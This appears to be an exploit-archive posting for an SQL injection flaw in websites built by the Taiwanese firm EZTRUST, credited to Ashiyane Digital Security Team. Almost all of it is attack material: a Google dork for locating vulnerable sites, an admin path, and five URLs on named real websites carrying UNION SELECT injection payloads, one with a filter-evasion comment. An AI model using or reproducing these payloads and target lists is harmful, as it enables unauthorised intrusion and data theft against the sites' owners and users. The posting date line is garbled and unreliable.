Design By EZTRUST SQL injection Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Design By EZTRUST SQL injection Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>###################### # Exploit Title : Design By EZTRUST SQL injection Vulnerability # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.eztrust.com.tw/ # Google Dork : intext:"è—èª ç§‘æŠ€" inurl:show.php # Date: 2016 21 October # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # admin page : target/admin/ # demos : # http://www.shichiart.com.tw/html/artist/show.php?num=12&kind=-1+union+select+version()--%20-&page=1%27 # http://www.wellnux.com/html/news/show.php?show=0&find=&find2=&chkkey01=&chkkey02=&find3=-C%27+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13--%20- # http://cabital.com.tw/html/news/show.php?show=0&class=' # http://0800072222.tw/mdbio_new/webc/html/product/02.php?kind=%5c&page=2 # http://www.pcmups.com.tw/eB/html/product/show.php?num=-15+/*!50000union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16--%20- ###################### # discovered by : modiret ######################</BODY></HTML>
